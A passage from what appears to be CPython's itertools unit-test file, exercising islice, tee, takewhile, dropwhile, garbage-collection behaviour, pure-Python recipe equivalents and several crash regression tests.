list(range(*args)))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*tgtargs)))
# Test stop=None
self.assertEqual(list(islice(range(10), None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), 2, None)), list(range(2, 10)))
self.assertEqual(list(islice(range(10), 1, None, 2)), list(range(1, 10, 2)))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test invalid arguments
ra = range(10)
self.assertRaises(TypeError, islice, ra)
self.assertRaises(TypeError, islice, ra, 1, 2, 3, 4)
self.assertRaises(ValueError, islice, ra, -5, 10, 1)
self.assertRaises(ValueError, islice, ra, 1, -5, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, 0)
self.assertRaises(ValueError, islice, ra, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1)
self.assertRaises(ValueError, islice, ra, 1, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1, 1)
self.assertRaises(ValueError, islice, ra, 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: Less islice in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# check copy, deepcopy, pickle
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 3),
(20,)
]:
self.assertEqual(list(copy.copy(islice(range(100), *args))),
list(range(*args)))
self.assertEqual(list(copy.deepcopy(islice(range(100), *args))),
list(range(*args)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, islice(range(100), *args))
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
support.gc_collect()
self.assertIsNone(wr())
# Issue #30537: islice can accept integer-like objects as
# arguments
class IntLike(object):
def __init__(self, val):
self.val = val
def __index__(self):
return self.val
self.assertEqual(list(islice(range(100), IntLike(10))), list(range(10)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50))),
list(range(10, 50)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50), IntLike(5))),
list(range(10,50,5)))
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, takewhile(10, [(4,5)]))
self.assertRaises(ValueError, next, takewhile(errfunc, [(4,5)]))
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, next, t)
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(takewhile(underten, data))), [1, 3, 5])
self.assertEqual(list(copy.deepcopy(takewhile(underten, data))),
[1, 3, 5])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, takewhile(underten, data))
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, dropwhile(10, [(4,5)]))
self.assertRaises(ValueError, next, dropwhile(errfunc, [(4,5)]))
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(dropwhile(underten, data))), [20, 2, 4, 6, 8])
self.assertEqual(list(copy.deepcopy(dropwhile(underten, data))),
[20, 2, 4, 6, 8])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, dropwhile(underten, data))
def test_tee(self):
n = 200
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(lzip(a,b), lzip(range(n), range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), list(range(n)))
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in range(100):
self.assertEqual(next(a), i)
del a
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in range(100):
self.assertEqual(next(a), i)
del b
self.assertEqual(list(a), list(range(100, n)))
for j in range(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = next(its[i])
lists[i].append(value)
self.assertEqual(lists[0], list(range(n)))
self.assertEqual(lists[1], list(range(n)))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(range(2000), 3)
for i in range(100):
self.assertEqual(next(a), i)
self.assertEqual(list(b), list(range(2000)))
self.assertEqual([next(c), next(c)], list(range(2)))
self.assertEqual(list(a), list(range(100,2000)))
self.assertEqual(list(c), list(range(2,2000)))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in range(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual([list(x) for x in result], [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weak referencable
a, b = tee(range(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
support.gc_collect() # For PyPy or other GCs.
self.assertRaises(ReferenceError, getattr, p, '__class__')
ans = list('abc')
long_ans = list(range(10000))
# check copy
a, b = tee('abc')
self.assertEqual(list(copy.copy(a)), ans)
self.assertEqual(list(copy.copy(b)), ans)
a, b = tee(list(range(10000)))
self.assertEqual(list(copy.copy(a)), long_ans)
self.assertEqual(list(copy.copy(b)), long_ans)
# check partially consumed copy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.copy(a)), ans[2:])
self.assertEqual(list(copy.copy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.copy(a)), long_ans[100:])
self.assertEqual(list(copy.copy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check deepcopy
a, b = tee('abc')
self.assertEqual(list(copy.deepcopy(a)), ans)
self.assertEqual(list(copy.deepcopy(b)), ans)
self.assertEqual(list(a), ans)
self.assertEqual(list(b), ans)
a, b = tee(range(10000))
self.assertEqual(list(copy.deepcopy(a)), long_ans)
self.assertEqual(list(copy.deepcopy(b)), long_ans)
self.assertEqual(list(a), long_ans)
self.assertEqual(list(b), long_ans)
# check partially consumed deepcopy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.deepcopy(a)), ans[2:])
self.assertEqual(list(copy.deepcopy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.deepcopy(a)), long_ans[100:])
self.assertEqual(list(copy.deepcopy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check pickle
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, iter(tee('abc')))
a, b = tee('abc')
self.pickletest(proto, a, compare=ans)
self.pickletest(proto, b, compare=ans)
# Issue 13454: Crash when deleting backward iterator from tee()
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def __next__(self):
first = self.first
self.first = False
if first:
return next(b)
a, b = tee(I())
with self.assertRaisesRegex(RuntimeError, "tee"):
next(a)
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def __next__(self):
start.set()
finish.wait()
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegex(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, next, zip())
for f in (chain, cycle, zip, groupby):
self.assertRaises(StopIteration, next, f([]))
self.assertRaises(StopIteration, next, f(StopNow()))
self.assertRaises(StopIteration, next, islice([], None))
self.assertRaises(StopIteration, next, islice(StopNow(), None))
p, q = tee([])
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
p, q = tee(StopNow())
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
self.assertRaises(StopIteration, next, repeat(None, 0))
for f in (filter, filterfalse, map, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, next, f(lambda x:x, []))
self.assertRaises(StopIteration, next, f(lambda x:x, StopNow()))
@support.cpython_only
def test_combinations_result_gc(self):
# bpo-42536: combinations's tuple-reuse speed trick breaks the GC's
# assumptions about what can be untracked. Make sure we re-track result
# tuples whenever we reuse them.
it = combinations([None, []], 1)
next(it)
gc.collect()
# That GC collection probably untracked the recycled internal result
# tuple, which has the value (None,). Make sure it's re-tracked when
# it's mutated and returned from __next__:
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_combinations_with_replacement_result_gc(self):
# Ditto for combinations_with_replacement.
it = combinations_with_replacement([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_permutations_result_gc(self):
# Ditto for permutations.
it = permutations([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_product_result_gc(self):
# Ditto for product.
it = product([None, []])
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_zip_longest_result_gc(self):
# Ditto for zip_longest.
it = zip_longest([[]])
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
class TestExamples(unittest.TestCase):
def test_accumulate(self):
self.assertEqual(list(accumulate([1,2,3,4,5])), [1, 3, 6, 10, 15])
def test_accumulate_reducible(self):
# check copy, deepcopy, pickle
data = [1, 2, 3, 4, 5]
accumulated = [1, 3, 6, 10, 15]
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = accumulate(data)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[:])
self.assertEqual(next(it), 1)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[1:])
it = accumulate(data)
self.assertEqual(next(it), 1)
self.assertEqual(list(copy.deepcopy(it)), accumulated[1:])
self.assertEqual(list(copy.copy(it)), accumulated[1:])
def test_accumulate_reducible_none(self):
# Issue #25718: total is None
it = accumulate([None, None, None], operator.is_)
self.assertEqual(next(it), None)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it_copy = pickle.loads(pickle.dumps(it, proto))
self.assertEqual(list(it_copy), [True, False])
self.assertEqual(list(copy.deepcopy(it)), [True, False])
self.assertEqual(list(copy.copy(it)), [True, False])
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_filter(self):
self.assertEqual(list(filter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_filterfalse(self):
self.assertEqual(list(filterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_map(self):
self.assertEqual(list(map(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_zip(self):
self.assertEqual(list(zip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_zip_longest(self):
self.assertEqual(list(zip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
list(map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split())))
self.assertEqual(list(permutations(range(3))),
[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
list(map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split())))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
def test_stapmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxsize, s.step or 1
it = iter(range(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in zip(range(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in zip(range(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
next(iterator)
del container, iterator
def test_accumulate(self):
a = []
self.makecycle(accumulate([1,2,a,3]), a)
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
n = 10
keyfunc = lambda x: x
for i, j in groupby(range(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_filter(self):
a = []
self.makecycle(filter(lambda x:True, [a]*2), a)
def test_filterfalse(self):
a = []
self.makecycle(filterfalse(lambda x:False, a), a)
def test_zip(self):
a = []
self.makecycle(zip([a]*2, [a]*3), a)
def test_zip_longest(self):
a = []
self.makecycle(zip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(zip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_map(self):
a = []
self.makecycle(map(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_pairwise(self):
a = []
self.makecycle(pairwise([a]*5), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_accumulate(self):
s = [1,2,3,4,5]
r = [1,3,6,10,15]
n = len(s)
for g in (G, I, Ig, L, R):
self.assertEqual(list(accumulate(g(s))), r)
self.assertEqual(list(accumulate(S(s))), [])
self.assertRaises(TypeError, accumulate, X(s))
self.assertRaises(TypeError, accumulate, N(s))
self.assertRaises(ZeroDivisionError, list, accumulate(E(s)))
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, compress, N(s), repeat(1))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, cycle, N(s))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, groupby, N(s))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_filter(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filter(isEven, g(s))),
[x for x in g(s) if isEven(x)])
self.assertRaises(TypeError, filter, isEven, X(s))
self.assertRaises(TypeError, filter, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filter(isEven, E(s)))
def test_filterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filterfalse(isEven, g(s))),
[x for x in g(s) if isOdd(x)])
self.assertRaises(TypeError, filterfalse, isEven, X(s))
self.assertRaises(TypeError, filterfalse, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filterfalse(isEven, E(s)))
def test_zip(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip(g(s))), lzip(g(s)))
self.assertEqual(list(zip(g(s), g(s))), lzip(g(s), g(s)))
self.assertRaises(TypeError, zip, X(s))
self.assertRaises(TypeError, zip, N(s))
self.assertRaises(ZeroDivisionError, list, zip(E(s)))
def test_ziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip_longest(g(s))), list(zip(g(s))))
self.assertEqual(list(zip_longest(g(s), g(s))), list(zip(g(s), g(s))))
self.assertRaises(TypeError, zip_longest, X(s))
self.assertRaises(TypeError, zip_longest, N(s))
self.assertRaises(ZeroDivisionError, list, zip_longest(E(s)))
def test_map(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(map(onearg, g(s))),
[onearg(x) for x in g(s)])
self.assertEqual(list(map(operator.pow, g(s), g(s))),
[x**x for x in g(s)])
self.assertRaises(TypeError, map, onearg, X(s))
self.assertRaises(TypeError, map, onearg, N(s))
self.assertRaises(ZeroDivisionError, list, map(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, islice, N(s), 10)
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_pairwise(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
seq = list(g(s))
expected = list(zip(seq, seq[1:]))
actual = list(pairwise(g(s)))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, pairwise, X(s))
self.assertRaises(TypeError, pairwise, N(s))
self.assertRaises(ZeroDivisionError, list, pairwise(E(s)))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = lzip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))),
[x**x for x in g(s)])
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, starmap, operator.pow, N(ss))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, takewhile, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, dropwhile, isOdd, N(s))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, tee, N(s))
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
class LengthTransparency(unittest.TestCase):
def test_repeat(self):
self.assertEqual(operator.length_hint(repeat(None, 50)), 50)
self.assertEqual(operator.length_hint(repeat(None, 0)), 0)
self.assertEqual(operator.length_hint(repeat(None), 12), 12)
def test_repeat_with_negative_times(self):
self.assertEqual(operator.length_hint(repeat(None, -1)), 0)
self.assertEqual(operator.length_hint(repeat(None, -2)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-1)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-2)), 0)
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(next(z))
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = map(g, items)
z = zip(*[gen]*len(tuple1))
next(z)
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
@support.skip_if_pgo_task
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
it = chain.from_iterable(() for unused in range(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
class K:
def __init__(self, v):
pass
def __eq__(self, other):
nonlocal i
i += 1
if i == 1:
next(g, None)
return True
i = 0
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
def test_keywords_in_subclass(self):
# count is not subclassable...
testcases = [
(repeat, (1, 2), [1, 1]),
(zip, ([1, 2], 'ab'), [(1, 'a'), (2, 'b')]),
(filter, (None, [0, 1]), [1]),
(filterfalse, (None, [0, 1]), [0]),
(chain, ([1, 2], [3, 4]), [1, 2, 3]),
(map, (str, [1, 2]), ['1', '2']),
(starmap, (operator.pow, ((2, 3), (3, 2))), [8, 9]),
(islice, ([1, 2, 3, 4], 1, 3), [2, 3]),
(takewhile, (isEven, [2, 3, 4]), [2]),
(dropwhile, (isEven, [2, 3, 4]), [3, 4]),
(cycle, ([1, 2],), [1, 2, 1]),
(compress, ('ABC', [1, 0, 1]), ['A', 'C']),
]
for cls, args, result in testcases:
with self.subTest(cls):
class subclass(cls):
pass
u = subclass(*args)
self.assertIs(type(u), subclass)
